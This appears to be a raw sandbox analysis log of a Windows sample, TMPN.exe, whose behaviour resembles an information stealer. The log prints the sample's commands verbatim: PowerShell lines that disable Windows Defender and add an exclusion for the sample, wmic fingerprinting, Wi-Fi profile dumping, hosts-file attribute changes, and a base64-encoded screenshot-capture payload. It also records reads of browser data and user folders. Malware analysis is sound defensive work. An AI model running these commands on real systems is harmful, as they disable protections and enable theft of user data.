Source: C:\Users\user\Desktop\TMPN.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic path win32_VideoController get name	Jump to behavior
Source: C:\Users\user\Desktop\TMPN.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath C:\Users\user\Desktop\TMPN.exe	Jump to behavior
Source: C:\Users\user\Desktop\TMPN.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic os get Caption	Jump to behavior
Source: C:\Users\user\Desktop\TMPN.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic cpu get Name	Jump to behavior
Source: C:\Users\user\Desktop\TMPN.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic path win32_VideoController get name	Jump to behavior
Source: C:\Users\user\Desktop\TMPN.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend	Jump to behavior
Source: C:\Users\user\Desktop\TMPN.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic csproduct get UUID	Jump to behavior
Source: C:\Users\user\Desktop\TMPN.exe	Process created: C:\Windows\System32\netsh.exe netsh wlan show profiles	Jump to behavior
Source: C:\Users\user\Desktop\TMPN.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABT	Jump to behavior
Source: C:\Users\user\Desktop\TMPN.exe	Process created: C:\Windows\System32\attrib.exe attrib -r C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\Desktop\TMPN.exe	Process created: C:\Windows\System32\attrib.exe attrib +r C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\0h3tdgef\0h3tdgef.cmdline"
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESEB20.tmp" "c:\Users\user\AppData\Local\Temp\0h3tdgef\CSC17976FD43C1F4C8D908DC9F141DC89D.TMP"

Source: C:\Users\user\Desktop\TMPN.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell set-mppreference -disableintrusionpreventionsystem $true -disableioavprotection $true -disablerealtimemonitoring $true -disablescriptscanning $true -enablecontrolledfolderaccess disabled -enablenetworkprotection auditmode -force -mapsreporting disabled -submitsamplesconsent neversend
Source: C:\Users\user\Desktop\TMPN.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -noprofile -executionpolicy bypass -encodedcommand jabzag8adqbyagmazqagad0aiabaaciadqakahuacwbpag4azwagafmaeqbzahqazqbtadsadqakahuacwbpag4azwagafmaeqbzahqazqbtac4aqwbvagwabablagmadabpag8abgbzac4arwblag4azqbyagkaywa7aa0acgb1ahmaaqbuagcaiabtahkacwb0aguabqauaeqacgbhahcaaqbuagcaowanaaoadqbzagkabgbnacaauwb5ahmadablag0algbxagkabgbkag8adwbzac4argbvahiabqbzadsadqakaa0acgbwahuaygbsagkaywagagmababhahmacwagafmaywbyaguazqbuahmaaabvahqadqakahsadqakacaaiaagacaacab1agiababpagmaiabzahqayqb0agkaywagaewaaqbzahqapabcagkadabtageacaa+acaaqwbhahaadab1ahiazqbtagmacgblaguabgbzacgakqanaaoaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaadgbhahiaiabyaguacwb1agwadabzacaapqagag4azqb3acaatabpahmadaa8aeiaaqb0ag0ayqbwad4akaapadsadqakacaaiaagacaaiaagacaaiab2ageacgagageababsafmaywbyaguazqbuahmaiaa9acaauwbjahiazqblag4algbbagwababtagmacgblaguabgbzadsadqakaa0acgagacaaiaagacaaiaagacaazgbvahiazqbhagmaaaagacgauwbjahiazqblag4aiabzagmacgblaguabgagagkabgagageababsafmaywbyaguazqbuahmakqanaaoaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagahqacgb5aa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagafiazqbjahqayqbuagcabablacaaygbvahuabgbkahmaiaa9acaacwbjahiazqblag4algbcag8adqbuagqacwa7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahuacwbpag4azwagacgaqgbpahqabqbhahaaiabiagkadabtageacaagad0aiabuaguadwagaeiaaqb0ag0ayqbwacgaygbvahuabgbkahmalgbxagkazab0aggalaagagiabwb1ag4azabzac4asablagkazwboahqakqapaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiab1ahmaaqbuagcaiaaoaecacgbhahaaaabpagmacwagagcacgbhahaaaabpagmacwagad0aiabhahiayqbwaggaaqbjahmalgbgahiabwbtaekabqbhagcazqaoagiaaqb0ag0ayqbwackakqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagagcacgbhahaaaabpagmacwauaemabwbwahkargbyag8abqbtagmacgblaguabgaoag4azqb3acaauabvagkabgb0acgaygbvahuabgbkahmalgbmaguazgb0acwaiabiag8adqbuagqacwauafqabwbwackalaagafaabwbpag4adaauaeuabqbwahqaeqasacaaygbvahuabgbkahmalgbtagkaegblackaowanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaacgblahmadqbsahqacwauaeeazabkacgakabcagkadabtageacaapagiaaqb0ag0ayqbwac4aqwbsag8abgblacgakqapadsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaywbhahqaywboacaakabfahgaywblahaadabpag8abgapaa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagac8alwagaegayqbuagqabablacaayqbuahkaiablahgaywblahaadabpag8abgbzacaaaablahiazqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaacgblahqadqbyag4aiabyaguacwb1agwadabzadsadqakacaaiaagacaafqanaaoafqanaaoaigbaaa0acganaaoaqqbkagqalqbuahkacablacaalqbuahkacablaeqazqbmagkabgbpahqaaqbvag4aiaakahmabwb1ahiaywblacaalqbsaguazgblahiazqbuagmazqbkaeeacwbzaguabqbiagwaaqblahmaiabt
Source: C:\Users\user\Desktop\TMPN.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell set-mppreference -disableintrusionpreventionsystem $true -disableioavprotection $true -disablerealtimemonitoring $true -disablescriptscanning $true -enablecontrolledfolderaccess disabled -enablenetworkprotection auditmode -force -mapsreporting disabled -submitsamplesconsent neversend	Jump to behavior
Source: C:\Users\user\Desktop\TMPN.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -noprofile -executionpolicy bypass -encodedcommand jabzag8adqbyagmazqagad0aiabaaciadqakahuacwbpag4azwagafmaeqbzahqazqbtadsadqakahuacwbpag4azwagafmaeqbzahqazqbtac4aqwbvagwabablagmadabpag8abgbzac4arwblag4azqbyagkaywa7aa0acgb1ahmaaqbuagcaiabtahkacwb0aguabqauaeqacgbhahcaaqbuagcaowanaaoadqbzagkabgbnacaauwb5ahmadablag0algbxagkabgbkag8adwbzac4argbvahiabqbzadsadqakaa0acgbwahuaygbsagkaywagagmababhahmacwagafmaywbyaguazqbuahmaaabvahqadqakahsadqakacaaiaagacaacab1agiababpagmaiabzahqayqb0agkaywagaewaaqbzahqapabcagkadabtageacaa+acaaqwbhahaadab1ahiazqbtagmacgblaguabgbzacgakqanaaoaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaadgbhahiaiabyaguacwb1agwadabzacaapqagag4azqb3acaatabpahmadaa8aeiaaqb0ag0ayqbwad4akaapadsadqakacaaiaagacaaiaagacaaiab2ageacgagageababsafmaywbyaguazqbuahmaiaa9acaauwbjahiazqblag4algbbagwababtagmacgblaguabgbzadsadqakaa0acgagacaaiaagacaaiaagacaazgbvahiazqbhagmaaaagacgauwbjahiazqblag4aiabzagmacgblaguabgagagkabgagageababsafmaywbyaguazqbuahmakqanaaoaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagahqacgb5aa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagafiazqbjahqayqbuagcabablacaaygbvahuabgbkahmaiaa9acaacwbjahiazqblag4algbcag8adqbuagqacwa7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahuacwbpag4azwagacgaqgbpahqabqbhahaaiabiagkadabtageacaagad0aiabuaguadwagaeiaaqb0ag0ayqbwacgaygbvahuabgbkahmalgbxagkazab0aggalaagagiabwb1ag4azabzac4asablagkazwboahqakqapaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiab1ahmaaqbuagcaiaaoaecacgbhahaaaabpagmacwagagcacgbhahaaaabpagmacwagad0aiabhahiayqbwaggaaqbjahmalgbgahiabwbtaekabqbhagcazqaoagiaaqb0ag0ayqbwackakqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagagcacgbhahaaaabpagmacwauaemabwbwahkargbyag8abqbtagmacgblaguabgaoag4azqb3acaauabvagkabgb0acgaygbvahuabgbkahmalgbmaguazgb0acwaiabiag8adqbuagqacwauafqabwbwackalaagafaabwbpag4adaauaeuabqbwahqaeqasacaaygbvahuabgbkahmalgbtagkaegblackaowanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaacgblahmadqbsahqacwauaeeazabkacgakabcagkadabtageacaapagiaaqb0ag0ayqbwac4aqwbsag8abgblacgakqapadsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaywbhahqaywboacaakabfahgaywblahaadabpag8abgapaa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagac8alwagaegayqbuagqabablacaayqbuahkaiablahgaywblahaadabpag8abgbzacaaaablahiazqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaacgblahqadqbyag4aiabyaguacwb1agwadabzadsadqakacaaiaagacaafqanaaoafqanaaoaigbaaa0acganaaoaqqbkagqalqbuahkacablacaalqbuahkacablaeqazqbmagkabgbpahqaaqbvag4aiaakahmabwb1ahiaywblacaalqbsaguazgblahiazqbuagmazqbkaeeacwbzaguabqbiagwaaqblahmaiabt	Jump to behavior

Source: TMPN.exe, 00000000.00000002.4583301658.000000C000056000.00000004.00001000.00020000.00000000.sdmp, TMPN.exe, 00000000.00000002.4583301658.000000C000077000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: Program Manager
Source: TMPN.exe, 00000000.00000002.4583301658.000000C000056000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: New Tab - Google ChromeNew Tab - Google Chromenew tab - google chromeNew Tab - Google ChromeNew Tab - Google Chromenew tab - google chromeNew Tab - Google ChromeNew Tab - Google Chromenew tab - google chromeNew Tab - Google ChromeNew Tab - Google Chromenew tab - google chromeNew Tab - Google ChromeNew Tab - Google Chromenew tab - google chromeNew Tab - Google ChromeNew Tab - Google Chromenew tab - google chromeNew Tab - Google ChromeNew Tab - Google Chromenew tab - google chromeNew Tab - Google ChromeNew Tab - Google Chromenew tab - google chromeNew Tab - Google ChromeNew Tab - Google Chromenew tab - google chromeNew Tab - Google ChromeNew Tab - Google Chromenew tab - google chromeNew Tab - Google ChromeNew Tab - Google Chromenew tab - google chromeNew Tab - Google ChromeNew Tab - Google Chromenew tab - google chromeNew Tab - Google ChromeNew Tab - Google Chromenew tab - google chromeNew Tab - Google ChromeNew Tab - Google Chromenew tab - google chromeNew Tab - Google ChromeNew Tab - Google Chromenew tab - google chromeNew Tab - Google ChromeNew Tab - Google Chromenew tab - google chromeNew Tab - Google ChromeNew Tab - Google Chromenew tab - google chromeNew Tab - Google ChromeNew Tab - Google Chromenew tab - google chromeNew Tab - Google ChromeNew Tab - Google Chromenew tab - google chromeNew Tab - Google ChromeNew Tab - Google Chromenew tab - google chromeNew Tab - Google ChromeNew Tab - Google Chromenew tab - google chromeNew Tab - Google ChromeNew Tab - Google Chromenew tab - google chromeNew Tab - Google ChromeNew Tab - Google Chromenew tab - google chromeNew Tab - Google ChromeNew Tab - Google Chromenew tab - google chromeNew Tab - Google ChromeNew Tab - Google Chromenew tab - google chromeNew Tab - Google ChromeNew Tab - Google Chromenew tab - google chromeNew Tab - Google ChromeNew Tab - Google Chromenew tab - google chromeNew Tab - Google ChromeNew Tab - Google Chromenew tab - google chromeNew Tab - Google ChromeNew Tab - Google Chromenew tab - google chromeNew Tab - Google ChromeNew Tab - Google Chromenew tab - google chromeNew Tab - Google ChromeNew Tab - Google Chromenew tab - google chromeNew Tab - Google ChromeNew Tab - Google Chromenew tab - google chromeNew Tab - Google ChromeNew Tab - Google Chromenew tab - google chromeNew Tab - Google ChromeNew Tab - Google Chromenew tab - google chromeProgram ManagerProgram Managerprogram managerDefault IMEDefault IMEdefault imeMSCTFIME UIMSCTFIME UImsctfime uiDefault IMEDefault IMEdefault imeDefault IMEDefault IMEdefault imeDefault IMEDefault IMEdefault imeMSCTFIME UIMSCTFIME UImsctfime uiDefault IMEDefault IMEdefault imeDefault IMEDefault IMEdefault imeDefault IMEDefault IMEdefault imeDefault IMEDefault IMEdefault imeDefault IMEDefault IMEdefault imeDefault IMEDefault IMEdefault imeDefault IMEDefault IMEdefault imeDefault IMEDefault IMEdefault imeDefault IMEDefault IMEdefault imeDefault IMEDefault IMEdefault imeDefault IMEDefault IMEdefault imeDefault IMEDefault IMEdefault imeDefault IMEDefa
Source: TMPN.exe, 00000000.00000002.4583301658.000000C000077000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: ,- Google Chromenew tab - google chromeNew Tab - Google ChromeNew Tab - Google Chromenew tab - google chromeNew Tab - Google ChromeNew Tab - Google Chromenew tab - google chromeNew Tab - Google ChromeNew Tab - Google Chromenew tab - google chromeNew Tab - Google ChromeNew Tab - Google Chromenew tab - google chromeNew Tab - Google ChromeNew Tab - Google Chromenew tab - google chromeProgram ManagerProgram Managerprogram managerDefault IMEDefault IMEdefault imeMSCTFIME UIMSCTFIME UI/X
Source: TMPN.exe, 00000000.00000002.4583301658.000000C000056000.00000004.00001000.00020000.00000000.sdmp, TMPN.exe, 00000000.00000002.4583301658.000000C000077000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: program manager

Source: C:\Users\user\Desktop\TMPN.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\TMPN.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\TMPN.exe	Queries volume information: \Device\CdRom0\ VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\TMPN.exe	Queries volume information: \Device\CdRom0\ VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\TMPN.exe	Queries volume information: C:\Users VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\TMPN.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\TMPN.exe	Queries volume information: \Device\CdRom0\ VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\TMPN.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\TMPN.exe	Queries volume information: \Device\CdRom0\ VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\TMPN.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\TMPN.exe	Queries volume information: \Device\CdRom0\ VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\TMPN.exe	Queries volume information: C:\Users VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\TMPN.exe	Queries volume information: C:\Users VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\TMPN.exe	Queries volume information: C:\Users VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\TMPN.exe	Queries volume information: C:\Users VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\TMPN.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\TMPN.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\TMPN.exe	Queries volume information: C:\Users\Default\Desktop VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\TMPN.exe	Queries volume information: C:\Users\Default\Downloads VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\TMPN.exe	Queries volume information: C:\Users\Default\Documents\My Music VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\TMPN.exe	Queries volume information: C:\Users\Default\Documents\My Pictures VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\TMPN.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\TMPN.exe	Queries volume information: \Device\CdRom0\ VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\TMPN.exe	Queries volume information: C:\Users\Default\Pictures VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\TMPN.exe	Queries volume information: C:\Users VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\TMPN.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\TMPN.exe	Queries volume information: C:\Users\Default\Music VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\TMPN.exe	Queries volume information: C:\Users\Default\Documents\My Music VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\TMPN.exe	Queries volume information: C:\Users\Default\Documents\My Pictures VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\TMPN.exe	Queries volume information: \Device\CdRom0\ VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\TMPN.exe	Queries volume information: C:\Users\Default\Videos VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\TMPN.exe	Queries volume information: C:\Users\Default\Pictures VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\TMPN.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\TMPN.exe	Queries volume information: \Device\CdRom0\ VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\TMPN.exe	Queries volume information: C:\Users VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\TMPN.exe	Queries volume information: C:\Users VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\TMPN.exe	Queries volume information: C:\Users\Default\OneDrive VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\TMPN.exe	Queries volume information: C:\Users\Default\OneDrive VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\TMPN.exe	Queries volume information: C:\Users\Public\Downloads VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\TMPN.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\games-Default\Default VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\TMPN.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\TMPN.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\games-Default\Default\Epic Games VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\TMPN.exe	Queries volume information: C:\Users\Public\Documents\My Music VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\TMPN.exe	Queries volume information: C:\Users\Public\Documents\My Pictures VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\TMPN.exe	Queries volume information: C:\Users\Public\Videos VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\TMPN.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\games-Default\Default\Minecraft VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\TMPN.exe	Queries volume information: C:\Users\Public\Desktop VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\TMPN.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\TMPN.exe	Queries volume information: C:\Users\user\Desktop\EWZCVGNOWT VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\TMPN.exe	Queries volume information: C:\Users\user\Desktop\IPKGELNTQY VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\TMPN.exe	Queries volume information: C:\Users\Public\Documents\My Music VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\TMPN.exe	Queries volume information: C:\Users\Public\Documents\My Pictures VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\TMPN.exe	Queries volume information: C:\Users\user\Documents\EEGWXUHVUG VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\TMPN.exe	Queries volume information: C:\Users\user\Documents\EEGWXUHVUG VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\TMPN.exe	Queries volume information: C:\Users\user\Documents\My Music VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\TMPN.exe	Queries volume information: C:\Users\user\Documents\IPKGELNTQY VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\TMPN.exe	Queries volume information: C:\Users\user\Documents\My Pictures VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\TMPN.exe	Queries volume information: C:\Users\user\Documents\My Music VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\TMPN.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\TMPN.exe	Queries volume information: C:\Users\user\Music VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\TMPN.exe	Queries volume information: C:\Users\user\Videos VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\TMPN.exe	Queries volume information: \Device\CdRom0\ VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\TMPN.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\TMPN.exe	Queries volume information: \Device\CdRom0\ VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\TMPN.exe	Queries volume information: C:\Users\user\Pictures\Saved Pictures VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\TMPN.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb\000003.log VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\TMPN.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\TMPN.exe	Queries volume information: \Device\CdRom0\ VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\TMPN.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\games-Public VolumeInformation	Jump to behavior
